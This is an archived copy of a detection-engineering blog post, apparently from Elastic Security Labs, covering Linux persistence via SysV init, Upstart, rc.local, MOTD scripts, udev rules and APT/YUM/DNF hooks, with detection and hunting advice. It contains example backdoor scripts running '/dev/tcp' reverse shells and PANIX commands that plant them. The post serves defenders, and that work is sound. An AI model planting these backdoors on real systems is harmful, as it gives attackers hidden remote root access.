{
	"id": "6d84d42c-f935-4e9a-9903-a5eaa31d3e6d",
	"created_at": "2026-04-06T00:14:22.908352Z",
	"updated_at": "2026-04-10T03:24:18.030036Z",
	"deleted_at": null,
	"sha1_hash": "ac5e1ae9222a705f18b7ba216fa2fad095e0a9e6",
	"title": "Linux Detection Engineering - A Sequel on Persistence Mechanisms",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4881998,
	"plain_text": "Linux Detection Engineering - A Sequel on Persistence\r\nMechanisms\r\nBy Ruben Groenewoud\r\nPublished: 2024-08-30 · Archived: 2026-04-05 13:08:57 UTC\r\nIntroduction\r\nIn this third part of the Linux Detection Engineering series, we’ll dive deeper into the world of Linux persistence.\r\nWe start with common or straightforward methods and move towards more complex or obscure techniques. The\r\ngoal remains the same: to educate defenders and security researchers on the foundational aspects of Linux\r\npersistence by examining both trivial and more complicated methods, understanding how these methods work,\r\nhow to hunt for them, and how to develop effective detection strategies.\r\nIn the previous article - \"Linux Detection Engineering - a primer on persistence mechanisms\" - we explored the\r\nfoundational aspects of Linux persistence techniques. If you missed it, you can find it here.\r\nWe'll set up the persistence mechanisms, analyze the logs, and observe the potential detection opportunities. To aid\r\nin this process, we’re sharing PANIX, a Linux persistence tool that Ruben Groenewoud of Elastic Security\r\ndeveloped. PANIX simplifies and customizes persistence setup to test potential detection opportunities.\r\nBy the end of this series, you'll have gained a comprehensive understanding of each of the persistence\r\nmechanisms that we covered, including:\r\nHow it works (theory)\r\nHow to set it up (practice)\r\nHow to detect it (SIEM and Endpoint rules)\r\nHow to hunt for it (ES|QL and OSQuery reference hunts)\r\nLet’s go beyond the basics and dig a little bit deeper into the world of Linux persistence, it’s fun!\r\nSetup note\r\nTo ensure you are prepared to detect the persistence mechanisms discussed in this article, it is important to enable\r\nand update our pre-built detection rules. 
If you are working with a custom-built ruleset and do not use all of our\r\npre-built rules, this is a great opportunity to test them and potentially fill in any gaps. Now, we are ready to get\r\nstarted.\r\nT1037 - boot or logon initialization scripts: Init\r\nInit, short for \"initialization,\" is the first process started by the kernel during the boot process on Unix-like\r\noperating systems. It continues running until the system is shut down. The primary role of an init system is to\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 1 of 25\n\nstart, stop, and manage system processes and services.\r\nThere are three major init implementations - Systemd, System V, and Upstart. In part 1 of this series, we focused\r\non Systemd. In this part, we will explore System V and Upstart. MITRE does not have specific categories for\r\nSystem V or Upstart. These are generally part of T1037.\r\nT1037 - boot or logon initialization scripts: System V init\r\nSystem V (SysV) init is one of the oldest and most traditional init systems. SysV init scripts are gradually being\r\nreplaced by modern init systems like Systemd. However, systemd-sysv-generator allows Systemd to handle\r\ntraditional SysV init scripts, ensuring older services and applications can still be managed within the newer\r\nframework.\r\nThe /etc/init.d/ directory is a key component of the SysV init system. It is responsible for controlling the\r\nstartup, running, and shutdown of services on a system. Scripts in this directory are executed at different run levels\r\nto manage various system services. Despite the rise of Systemd as the default init system in many modern Linux\r\ndistributions, init.d scripts are still widely used and supported, making them a viable option for persistence.\r\nThe scripts in init.d are used to start, stop, and manage services. 
These scripts are executed with root\r\nprivileges, providing a powerful means for both administrators and attackers to ensure certain commands or\r\nservices run on boot. These scripts are often linked to runlevel directories like /etc/rc0.d/ , /etc/rc1.d/ , etc.,\r\nwhich determine when the scripts are run. Runlevels, ranging from 0 to 6, define specific operational states, each\r\nconfiguring different services and processes to manage system behavior and user interactions. Runlevels vary\r\ndepending on the distribution, but generally look like the following:\r\n0: Shutdown\r\n1: Single User Mode\r\n2: Multiuser mode without networking\r\n3: Multiuser mode with networking\r\n4: Unused\r\n5: Multiuser mode with networking and GUI\r\n6: Reboot\r\nDuring system startup, scripts are executed based on the current runlevel configuration. Each script must follow a\r\nspecific structure, including start , stop , restart , and status commands to manage the associated\r\nservice. Scripts prefixed with S (start) or K (kill) dictate actions during startup or shutdown, respectively,\r\nordered by their numerical sequence.\r\nAn example of a malicious init.d script might look similar to the following:\r\n#! /bin/sh\r\n### BEGIN INIT INFO\r\n# Provides: malicious-sysv-script\r\n# Required-Start: $remote_fs $syslog\r\n# Required-Stop: $remote_fs $syslog\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 2 of 25\n\n# Default-Start: 2 3 4 5\r\n# Default-Stop: 0 1 6\r\n### END INIT INFO\r\ncase \"$1\" in\r\n start)\r\n echo \"Starting malicious-sysv-script\"\r\n nohup setsid bash -c 'bash -i \u003e\u0026 /dev/tcp/$ip/$port 0\u003e\u00261'\r\n ;;\r\nesac\r\nThe script must be placed in the /etc/init.d/ directory and be granted execution permissions. Similarly to\r\nSystemd services, SysV scripts must also be enabled. A common utility to manage SysV configurations is\r\nupdate-rc.d . 
It allows administrators to enable or disable services and manage the symbolic links (start and kill\r\nscripts) in the /etc/rc*.d/ directories, automatically setting the correct runlevels based on the configuration of\r\nthe script.\r\nsudo update-rc.d malicious-sysv-script defaults\r\nThe malicious-sysv-script is now enabled and ready to run on boot. MITRE specifies more information and\r\nreal-world examples related to this technique in T1037.\r\nPersistence through T1037 - System V init\r\nYou can manually set up a test script within the /etc/init.d/ directory, grant it execution permissions, enable it,\r\nand reboot it, or simply use PANIX. PANIX is a Linux persistence tool that simplifies and customizes persistence\r\nsetup for testing your detections. We can use it to establish persistence simply by running:\r\n\u003e sudo ./panix.sh --initd --default --ip 192.168.1.1 --port 2006\r\n\u003e [+] init.d backdoor established with IP 192.168.1.1 and port 2006.\r\nPrior to rebooting and actually establishing persistence, we can see the following documents being generated in\r\nDiscover:\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 3 of 25\n\nEvents generated as a result of System V init persistence establishment\r\nAfter executing PANIX, it generates a SysV init script named /etc/init.d/ssh-procps , applies executable\r\npermissions using chmod +x , and utilizes update-rc.d . This command triggers systemctl daemon-reload ,\r\nwhich, in turn, activates the systemd-sysv-generator to enable ssh-procps during system boot.\r\nLet’s reboot the system and look at the events that are generated on shutdown/boot.\r\nEvents generated as a result of System V init persistence establishment\r\nAs the SysV init system is loaded early, the start command is not logged. Since it is impossible to detect an event\r\nbefore events are being ingested, we need to be creative in detecting this technique. 
Elastic will capture\r\nalready_running event actions for service initialization events. Through this chain we are capable of detecting\r\nthe execution of the service, followed by the reverse shell that was initiated. We have several detection\r\nopportunities for this persistence technique.\r\nHunting for T1037 - System V init\r\nOther than relying on detections, it is important to incorporate threat hunting into your workflow, especially for\r\npersistence mechanisms like these, where events can potentially be missed due to timing. This blog will solely list\r\nthe available hunts for each persistence mechanism; however, more details regarding this topic are outlined at the\r\nend of the first section in the previous article on persistence. Additionally, descriptions and references can be\r\nfound in our Detection Rules repository, specifically in the Linux hunting subdirectory.\r\nWe can hunt for System V Init persistence through ES|QL and OSQuery, focusing on unusual process executions\r\nand file creations. The Persistence via System V Init rule contains several ES|QL and OSQuery queries that can\r\nhelp hunt for these types of persistence.\r\nT1037 - boot or logon initialization scripts: Upstart\r\nUpstart was introduced as an alternative init system designed to improve boot performance and manage system\r\nservices more dynamically than traditional SysV init. While it has been largely supplanted by systemd in many\r\nLinux distributions, Upstart is still used in some older releases and legacy systems.\r\nThe core of Upstart's configuration resides in the /etc/init/ directory, where job configuration files define how\r\nservices are started, stopped, and managed. Each job file specifies dependencies, start conditions, and actions to be\r\ntaken upon start, stop, and other events.\r\nIn Upstart, run levels are replaced with events and tasks, which define the sequence and conditions under which\r\njobs are executed. 
Upstart introduces a more event-driven model, allowing services to start based on various\r\nsystem events rather than predefined run levels.\r\nUpstart can run system-wide or in user-session mode. While system-wide configurations are placed in the\r\n/etc/init/ directory, user-session mode configurations are located in:\r\n~/.config/upstart/\r\n~/.init/\r\n/etc/xdg/upstart/\r\n/usr/share/upstart/sessions/\r\nAn example of an Upstart job file can look like this:\r\ndescription \"Malicious Upstart Job\"\r\nauthor \"Ruben Groenewoud\"\r\nstart on runlevel [2345]\r\nstop on shutdown\r\nexec nohup setsid bash -c 'bash -i \u003e\u0026 /dev/tcp/$ip/$port 0\u003e\u00261'\r\nThe malicious-upstart-job.conf file defines a job that starts on run levels 2, 3, 4, and 5 (general Linux access\r\nand networking), and stops on the shutdown event (run levels 0, 1, and 6). The exec line executes the malicious\r\npayload to establish a reverse shell connection when the system boots up.\r\nTo enable the Upstart job and ensure it runs on boot, the job file must be placed in /etc/init/ and given\r\nappropriate permissions. Upstart jobs are automatically recognized and managed by the Upstart init daemon.\r\nUpstart was deprecated a long time ago, with Linux distributions such as Debian 7 and Ubuntu 14.04 being among\r\nthe last releases to ship Upstart. Later releases moved to Systemd, removing\r\ncompatibility with Upstart altogether. Based on the data in our support matrix, only the Elastic Agent in Beta\r\nversion supports some of these old operating systems, and the recent version of Elastic Defend does not run on\r\nthem at all. These systems have been EOL for years and should not be used in production environments anymore.\r\nFor this reason, we added support/coverage for this technique to the Potential Persistence via File\r\nModification detection rule. 
If you are still running these systems in production, using, for example, old versions\r\nof Auditbeat to gather its logs, you can set up Auditbeat file creation and FIM file modification rules in the\r\n/etc/init/ directory, similar to the techniques mentioned in the previous blog, and in the sections yet to come.\r\nSimilarly to System V Init, information and real-world examples related to this technique are specified by MITRE\r\nin T1037.\r\nT1037.004 - boot or logon initialization scripts: run control (RC) scripts\r\nThe rc.local script is a traditional method for executing commands or scripts on Unix-like operating systems\r\nduring system boot. It is located at /etc/rc.local and is typically used to start services, configure networking,\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 5 of 25\n\nor perform other system initialization tasks that do not warrant a full init script. In Darwin-based systems and very\r\nfew other Unix-like systems, /etc/rc.common is used for the same purpose.\r\nNewer versions of Linux distributions have phased out the /etc/rc.local file in favor of Systemd for handling\r\ninitialization scripts. Systemd provides compatibility through the systemd-rc-local-generator generator; this\r\nexecutable ensures backward compatibility by checking if /etc/rc.local exists and is executable. If it meets\r\nthese criteria, it integrates the rc-local.service unit into the boot process. Therefore, as long as this generator\r\nis included in the Systemd setup, /etc/rc.local scripts will execute during system boot. In RHEL derivatives,\r\n/etc/rc.d/rc.local must be granted execution permissions for this technique to work.\r\nThe rc.local script is a shell script that contains commands or scripts to be executed once at the end of the\r\nsystem boot process, after all other system services have been started. This makes it useful for tasks that require\r\nspecific system conditions to be met before execution. 
Here’s an example of how a simple backdoored rc.local\r\nscript might look:\r\n#!/bin/sh\r\n/bin/bash -c 'sh -i \u003e\u0026 /dev/tcp/$ip/$port 0\u003e\u00261'\r\nexit 0\r\nThe command above creates a reverse shell by opening a bash session that redirects input and output to a specified\r\nIP address and port, allowing remote access to the system.\r\nTo ensure rc.local runs during boot, the script must be marked executable. On the next boot, the systemd-rc-local-generator will create the necessary symlink in order to enable the rc-local.service and execute the\r\nrc.local script. RC scripts did receive their own sub-technique by MITRE. More information and examples of\r\nreal-world usage of RC Scripts for persistence can be found in T1037.004.\r\nPersistence through T1037.004 - run control (RC) scripts\r\nAs long as the systemd-rc-local-generator is present, establishing persistence through this technique is simple.\r\nCreate the /etc/rc.local file, add your payload, and mark it as executable. We will leverage the following\r\nPANIX command to establish it for us.\r\n\u003e sudo ./panix.sh --rc-local --default --ip 192.168.1.1 --port 2007\r\n\u003e [+] rc.local backdoor established\r\nAfter rebooting the system, we can see the following events being generated:\r\nEvents generated as a result of RC Script persistence establishment\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 6 of 25\n\nThe same issue as before arises. We see the execution of PANIX, creating the /etc/rc.local file and granting it\r\nexecution permissions. When running systemctl daemon-reload , we can see the systemd-rc-local-generator\r\ncreating a symlink in the /run/systemd/generator[.early|late] directories.\r\nSimilar to the previous example in which we ran into this issue, we can again use the already_running\r\nevent.action documents to get some information on the executions. 
Digging into this, one method that detects\r\npotential traces of rc.local execution is to search for documents containing /etc/rc.local start entries:\r\nEvents generated as a result of rc.local service status\r\nWhere we see /etc/rc.local being started, after which a suspicious command is executed. The /opt/bds_elf\r\nis a rootkit, leveraging rc.local as a persistence method.\r\nAdditionally, we can leverage the syslog data source, as this file is parsed on initialization of the system\r\nintegration. You can set up Filebeat or the Elastic Agent with the System integration to harvest syslog. When\r\nlooking at potential errors in its execution logs, we can detect other traces of rc.local execution events for both\r\nour testing and rootkit executions:\r\nEvents generated as a result of /etc/rc.local syslog error messages\r\nBecause of the challenges in detecting these persistence mechanisms, it is very important to catch traces as early\r\nin the chain as possible. Leveraging a multi-layered defense strategy increases the chances of detecting techniques\r\nlike these.\r\nHunting for T1037.004 - run control (RC) scripts\r\nSimilar to the System V Init detection opportunity limitations, this technique deals with the same limitations due\r\nto timing. Thus, hunting for RC Script persistence is important. We can hunt for this technique by looking at\r\n/etc/rc.local file creations and/or modifications and the existence of the rc-local.service systemd\r\nunit/startup item. The Persistence via rc.local/rc.common rule contains several ES|QL and OSQuery queries that\r\naid in hunting for this technique.\r\nT1037 - boot or logon initialization scripts: Message of the Day (MOTD)\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 7 of 25\n\nMessage of the Day (MOTD) is a feature that displays a message to users when they log in via SSH or a local\r\nterminal. 
To display messages before and after the login process, Linux uses the /etc/issue and the /etc/motd\r\nfiles. These messages display on the command line and will not be seen before and after a graphical login. The\r\n/etc/issue file is typically used to display a login message or banner, while the /etc/motd file generally\r\ndisplays issues, security policies, or messages. These messages are global and will display to all users at the\r\ncommand line prompt. Only a privileged user (such as root) can edit these files.\r\nIn addition to the static /etc/motd file, modern systems often use dynamic MOTD scripts stored in\r\n/etc/update-motd.d/ . These scripts generate dynamic content that can be included in the MOTD, such as\r\ncurrent system metrics, weather updates, or news headlines.\r\nThese dynamic scripts are shell scripts that execute shell commands. It is possible to create a new file within this\r\ndirectory or to add a backdoor to an existing one. Once the script has been granted execution permissions, it will\r\nexecute every time a user logs in.\r\nRHEL derivatives do not make use of dynamic MOTD scripts in a similar way as Debian does, and are not\r\nsusceptible to this technique.\r\nAn example of a backdoored /etc/update-motd.d/ file could look like this:\r\n#!/bin/sh\r\nnohup setsid bash -c 'bash -i \u003e\u0026 /dev/tcp/$ip/$port 0\u003e\u00261'\r\nLike before, MITRE does not have a specific technique related to this. Therefore we classify this technique as\r\nT1037.\r\nPersistence through T1037 - message of the day (MOTD)\r\nA payload similar to the one presented above should be used to ensure the backdoor does not interrupt the SSH\r\nlogin, potentially triggering the user’s attention. 
We can leverage PANIX to set up persistence on Debian-based\r\nsystems through MOTD like so:\r\n\u003e sudo ./panix.sh --motd --default --ip 192.168.1.1 --port 2008\r\n\u003e [+] MOTD backdoor established in /etc/update-motd.d/137-python-upgrades\r\nTo trigger the backdoor, we can reconnect to the server via SSH or reconnect to the terminal.\r\nEvents generated as a result of Message of the Day (MOTD) persistence establishment\r\nIn the image above we can see PANIX being executed, which creates the /etc/update-motd.d/137-python-upgrades\r\nfile and marks it as executable. Next, when a user connects to SSH/console, the payload is executed,\r\nresulting in an egress network connection by the root user. This is a straightforward attack chain, and we have\r\nseveral layers of detections for this:\r\nHunting for T1037 - message of the day (MOTD)\r\nHunting for MOTD persistence can be conducted through ES|QL and OSQuery. We can do so by analyzing file\r\ncreations in these directories and executions from MOTD parent processes. We created the Persistence via\r\nMessage-of-the-Day rule to aid in this endeavor.\r\nT1546 - event triggered execution: udev\r\nUdev is the device manager for the Linux kernel, responsible for managing device nodes in the /dev directory. It\r\ndynamically creates or removes device nodes, manages permissions, and handles various events triggered by\r\ndevice state changes. Essentially, Udev acts as an intermediary between the kernel and user space, ensuring that\r\nthe operating system appropriately handles hardware changes.\r\nWhen a new device is added to the system (such as a USB drive, keyboard, or network interface), Udev detects\r\nthis event and applies predefined rules to manage the device. Each rule consists of key-value pairs that match\r\ndevice attributes and actions to be performed. 
Udev rules files are processed in lexical order, and rules can match\r\nvarious device attributes, including device type, kernel name, and more. Udev rules are defined in text files within\r\na default set of directories:\r\n/etc/udev/rules.d/\r\n/run/udev/rules.d/\r\n/usr/lib/udev/rules.d/\r\n/usr/local/lib/udev/rules.d/\r\n/lib/udev/\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 9 of 25\n\nPriority is measured based on the source directory of the rule file and takes precedence based on the order listed\r\nabove ( /etc/ → /run/ → /usr/ ). When a rule matches, it can trigger a wide range of actions, including\r\nexecuting arbitrary commands or scripts. This flexibility makes Udev a potential vector for persistence by\r\nmalicious actors. An example Udev rule looks like the following:\r\nSUBSYSTEM==\"block\", ACTION==\"add|change\", ENV{DM_NAME}==\"ubuntu--vg-ubuntu--lv\", SYMLINK+=\"disk/by-dname/ubuntu\r\nTo leverage this method for persistence, root privileges are required. 
Once a rule file is created, the rules need to\r\nbe reloaded.\r\nsudo udevadm control --reload-rules\r\nTo test the rule, either perform the action specified in the rule file or use the udevadm trigger utility.\r\nsudo udevadm trigger -v\r\nAdditionally, these drivers can be monitored using udevadm , by running:\r\nudevadm monitor --environment\r\nEder’s blog titled “Leveraging Linux udev for persistence” is a very good read for more information on this topic.\r\nThis technique has several limitations, making it more difficult to leverage the persistence mechanism.\r\nUdev rules are limited to short foreground tasks due to potential blocking of subsequent events.\r\nThey cannot execute programs accessing networks or filesystems, enforced by systemd-udevd.service 's\r\nsandbox.\r\nLong-running processes are terminated after event handling.\r\nDespite these restrictions, bypasses include creating detached processes outside udev rules for executing implants,\r\nsuch as:\r\nLeveraging at / cron / systemd for independent scheduling.\r\nInjecting code into existing processes.\r\nAlthough persistence would be set up through a different technique than udev, udev would still grant a persistence\r\nmechanism for the at / cron / systemd persistence mechanism. MITRE does not have a technique dedicated to\r\nthis mechanism — the most logical technique to add this to would be T1546.\r\nResearchers from AON recently discovered a malware called \"sedexp\" that achieves persistence using Udev rules\r\n- a technique rarely seen in the wild - so be sure to check out their research article.\r\nPersistence through T1546 - udev\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 10 of 25\n\nPANIX allows you to test all three techniques by leveraging --at , --cron and --systemd , respectively. Or go\r\nahead and test it manually. 
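As an illustration of the at-based variant described above, a manually planted rule could look like the following. The filename and payload path are hypothetical, invented for illustration:

```
# /etc/udev/rules.d/10-example.rules (hypothetical)
# Schedules a detached payload via at whenever a block device is added,
# sidestepping systemd-udevd's restrictions on long-running tasks.
ACTION=="add", SUBSYSTEM=="block", RUN+="/usr/bin/at -f /usr/bin/payload now"
```

After dropping such a file in place, reloading the rules and triggering an event (or rebooting) arms it, as described above.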
We can set up udev persistence through at , by running the following command:\r\n\u003e sudo ./panix.sh --udev --default --ip 192.168.1.1 --port 2009 --at\r\nTo trigger the payload, you can either run sudo udevadm trigger or reboot the system. Let’s analyze the events\r\nin Discover.\r\nEvents generated as a result of Udev At persistence establishment\r\nIn the figure above, PANIX is executed, which creates the /usr/bin/atest backdoor and grants it execution\r\npermissions. Subsequently, the 10-atest.rules file is generated, and the drivers are reloaded and triggered. This\r\ncauses At to be spawned as a child process of udevadm , creating the atspool / atjob , and subsequently\r\nexecuting the reverse shell.\r\nCron follows a similar structure; however, it is slightly more difficult to catch the malicious activity, as the child\r\nprocess of udevadm is bash , which is not unusual.\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 11 of 25\n\nEvents generated as a result of Udev Cron persistence establishment\r\nFinally, when looking at the documents generated by Udev in combination with Systemd, we see the following:\r\nEvents generated as a result of Udev Systemd persistence establishment\r\nWhich also does not show a relationship with udev, other than the 12-systemdtest.rules file that is created.\r\nThis leads these last two mechanisms to be detected through our previous systemd/cron related rules, rather than\r\nspecific udev rules. Let’s take a look at the coverage (We omitted the systemd / cron rules, as these were\r\nalready mentioned in the previous persistence blog):\r\nHunting for T1546 - udev\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 12 of 25\n\nHunting for Udev persistence can be conducted through ES|QL and OSQuery. By leveraging ES|QL, we can\r\ndetect unusual file creations and process executions, and through OSQuery we can do live hunting on our\r\nmanaged systems. 
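For quick manual triage alongside those queries, simply grepping the rule directories for RUN entries surfaces every rule that executes a program. A minimal sketch, assuming POSIX sh; the optional prefix argument exists only so the function can be pointed at a test tree instead of the live system:

```shell
# List udev rules that launch programs via RUN+= (manual triage sketch).
# $1 is an optional root prefix, e.g. a staging copy of the filesystem.
list_udev_run_rules() {
  prefix="${1:-}"
  for dir in /etc/udev/rules.d /run/udev/rules.d \
             /usr/lib/udev/rules.d /usr/local/lib/udev/rules.d; do
    # Skip directories that do not exist under this prefix.
    [ -d "$prefix$dir" ] || continue
    # Print filename and matching line for every RUN+= assignment.
    grep -H 'RUN+=' "$prefix$dir"/*.rules 2>/dev/null
  done
  return 0
}
```

Any hit pointing at an interpreter, at, or an unfamiliar binary deserves a closer look, with the directory precedence order described above in mind.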
To get you started, we created the Persistence via Udev rule, containing several different\r\nqueries.\r\nT1546.016 - event triggered execution: installer packages\r\nPackage managers are tools responsible for installing, updating, and managing software packages. Three widely\r\nused package managers are APT (Advanced Package Tool), YUM (Yellowdog Updater, Modified), and YUM’s\r\nsuccessor, DNF (Dandified YUM). Beyond their legitimate uses, these tools can be leveraged by attackers to\r\nestablish persistence on a system by hijacking the package manager execution flow, ensuring malicious code is\r\nexecuted during routine package management operations. MITRE details information related to this technique\r\nunder the identifier T1546.016.\r\nT1546.016 - installer packages (APT)\r\nAPT is the default package manager for Debian-based Linux distributions like Debian, Ubuntu, and their\r\nderivatives. It simplifies the process of managing software packages and dependencies. APT utilizes several\r\nconfiguration mechanisms to customize its behavior and enhance package management efficiency.\r\nAPT hooks allow users to execute scripts or commands at specific points during package installation, removal, or\r\nupgrade operations. These hooks are stored in /etc/apt/apt.conf.d/ and can be leveraged to execute actions\r\npre- and post-installation. The structure of APT configuration files follows a numeric ordering convention to\r\ncontrol the application of configuration snippets that customize various aspects of APT's behavior. A regular APT\r\nhook looks like this:\r\nDPkg::Post-Invoke {\"if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi;\"};\r\nThese configuration files can be exploited by attackers to execute malicious binaries or code whenever an APT\r\noperation is executed. 
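For contrast with the benign hook above, a malicious counterpart could be a drop-in of the following shape. The filename and payload path are hypothetical, invented for illustration; the detached nohup/setsid invocation keeps the hook from blocking the APT run:

```
// /etc/apt/apt.conf.d/00illustrative-backdoor (hypothetical)
// Runs a detached command before every 'apt update'.
APT::Update::Pre-Invoke {"nohup setsid bash -c '/tmp/payload.sh' >/dev/null 2>&1 &";};
```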
This vulnerability extends to automated processes like auto-updates, enabling persistent\r\nexecution on systems with automatic update features enabled.\r\nPersistence through T1546.016 - installer packages (APT)\r\nTo test this method, a Debian-based system that leverages APT or the manual installation of APT is required.\r\nMake sure that if you perform this step manually, that you do not break the APT package manager, as a carefully\r\ncrafted payload that detaches and runs in the background is necessary to not interrupt the execution chain. You can\r\nsetup APT persistence by running:\r\n\u003e sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2012 --apt\r\n\u003e [+] APT persistence established\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 13 of 25\n\nTo trigger the payload, run an APT command, such as sudo apt update . This will spawn a reverse shell. Let’s\r\ntake a look at the events in Discover:\r\nEvents generated as a result of package manager (APT) persistence establishment\r\nIn the figure above, we see PANIX being executed, creating the 01python-upgrades file, and successfully\r\nestablishing the APT hook. After running sudo apt update , APT reads the configuration file and executes the\r\npayload, initiating the sh → nohup → setsid → bash reverse shell chain. Our coverage is multi-layered,\r\nand detects the following events:\r\nT1546.016 - installer packages (YUM)\r\nYUM (Yellowdog Updater, Modified) is the default package management system used in Red Hat-based Linux\r\ndistributions like CentOS and Fedora. YUM employs plugin architecture to extend its functionality, allowing users\r\nto integrate custom scripts or programs that execute at various stages of the package management lifecycle. 
These\r\nplugins are stored in specific directories and can perform actions such as logging, security checks, or custom\r\npackage handling.\r\nThe structure of YUM plugins typically involves placing them in directories like:\r\n/etc/yum/pluginconf.d/ (for configuration files)\r\n/usr/lib/yum-plugins/ (for plugin scripts)\r\nFor plugins to be enabled, the /etc/yum.conf file must have the plugins=1 set. These plugins can intercept\r\nYUM operations, modify package installation behaviors, or execute additional actions before or after package\r\ntransactions. YUM plugins are quite extensive, but a basic YUM plugin template might look like this:\r\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\r\nrequires_api_version = '2.3'\r\nplugin_type = (TYPE_CORE, TYPE_INTERACTIVE)\r\ndef init_hook(conduit):\r\n conduit.info(2, 'Hello world')\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 14 of 25\n\ndef postreposetup_hook(conduit):\r\n raise PluginYumExit('Goodbye')\r\nEach plugin must be enabled through a .conf configuration file:\r\n[main]\r\nSimilar to APT's configuration files, YUM plugins can be leveraged by attackers to execute malicious code during\r\nroutine package management operations, particularly during automated processes like system updates, thereby\r\nestablishing persistence on vulnerable systems.\r\nPersistence through T1546.016 - Installer Packages (YUM)\r\nSimilar to APT, YUM plugins should be crafted carefully to not interfere with the YUM update execution flow.\r\nUse this example or set it up by running:\r\n\u003e sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2012 --yum\r\n[+] Yum persistence established\r\nAfter planting the persistence mechanism, a command similar to sudo yum upgrade can be run to establish a\r\nreverse connection.\r\nEvents generated as a result of package manager (YUM) persistence establishment\r\nWe see PANIX being executed, /usr/lib/yumcon , 
/usr/lib/yum-plugins/yumcon.py and\r\n/etc/yum/pluginconf.d/yumcon.conf being created. /usr/lib/yumcon is executed by yumcon.py , which is\r\nenabled in yumcon.conf . After updating the system, the reverse shell execution chain ( yum → sh → setsid\r\n→ yumcon → python ) is executed. Similar to APT, our YUM coverage is multi-layered, and detects the\r\nfollowing events:\r\nT1546.016 - installer packages (DNF)\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 15 of 25\n\nDNF (Dandified YUM) is the next-generation package manager used in modern Red Hat-based Linux\r\ndistributions, including Fedora and CentOS. It replaces YUM while maintaining compatibility with YUM\r\nrepositories and packages. Similar to YUM, DNF utilizes a plugin system to extend its functionality, enabling\r\nusers to integrate custom scripts or programs that execute at key points in the package management lifecycle.\r\nDNF plugins enhance its capabilities by allowing customization and automation beyond standard package\r\nmanagement tasks. These plugins are stored in specific directories:\r\n/etc/dnf/pluginconf.d/ (for configuration files)\r\n/usr/lib/python3.9/site-packages/dnf-plugins/ (for plugin scripts)\r\nOf course the location for the dnf-plugins are bound to the Python version that is running on your system.\r\nSimilarly to YUM, to enable a plugin, plugins=1 must be set in /etc/dnf/dnf.conf . 
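That file is a standard INI-style configuration; the relevant stanza is minimal:

```
# /etc/dnf/dnf.conf
[main]
plugins=1
```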
An example of a DNF plugin can look like this:\r\nimport dbus\r\nimport dnf\r\nfrom dnfpluginscore import _\r\n\r\nclass NotifyPackagekit(dnf.Plugin):\r\n    name = "notify-packagekit"\r\n\r\n    def __init__(self, base, cli):\r\n        super(NotifyPackagekit, self).__init__(base, cli)\r\n        self.base = base\r\n        self.cli = cli\r\n\r\n    def transaction(self):\r\n        try:\r\n            bus = dbus.SystemBus()\r\n            proxy = bus.get_object('org.freedesktop.PackageKit', '/org/freedesktop/PackageKit')\r\n            iface = dbus.Interface(proxy, dbus_interface='org.freedesktop.PackageKit')\r\n            iface.StateHasChanged('posttrans')\r\n        except:\r\n            pass\r\nAs for YUM, each plugin must be enabled through a .conf configuration file:\r\n[main]\r\nenabled=1\r\nSimilar to YUM's plugins and APT's configuration files, DNF plugins can be exploited by malicious actors to inject and execute unauthorized code during routine package management tasks. This attack vector extends to automated processes such as system updates, enabling persistent execution on systems with DNF-enabled repositories.\r\nPersistence through T1546.016 - installer packages (DNF)\r\nSimilar to APT and YUM, DNF plugins should be crafted carefully so that they do not interfere with the DNF update execution flow. You can use the following example or set it up by running:\r\n> sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2013 --dnf\r\n> [+] DNF persistence established\r\nRunning a command similar to sudo dnf update will trigger the backdoor. Take a look at the events:\r\nEvents generated as a result of package manager (DNF) persistence establishment\r\nAfter the execution of PANIX, /usr/lib/python3.9/site-packages/dnfcon, /etc/dnf/plugins/dnfcon.conf and /usr/lib/python3.9/site-packages/dnf-plugins/dnfcon.py are created, and the backdoor is established. These locations are dynamic, based on the Python version in use. 
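Because the plugin directory embeds the interpreter's major.minor version, a hunt or deployment script should derive the path rather than hard-code /usr/lib/python3.9/...; a minimal sketch (the helper names are our own, not part of DNF or PANIX):

```python
import sys
from pathlib import Path

def dnf_plugin_dir() -> Path:
    """Derive the version-dependent DNF plugin script directory."""
    ver = f"{sys.version_info.major}.{sys.version_info.minor}"
    return Path(f"/usr/lib/python{ver}/site-packages/dnf-plugins")

def installed_plugins() -> list:
    """List plugin script names, or an empty list if the directory is absent."""
    d = dnf_plugin_dir()
    return sorted(p.name for p in d.glob("*.py")) if d.is_dir() else []
```

Comparing the listed names against the plugins a distribution ships by default makes unexpected additions like dnfcon.py stand out.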
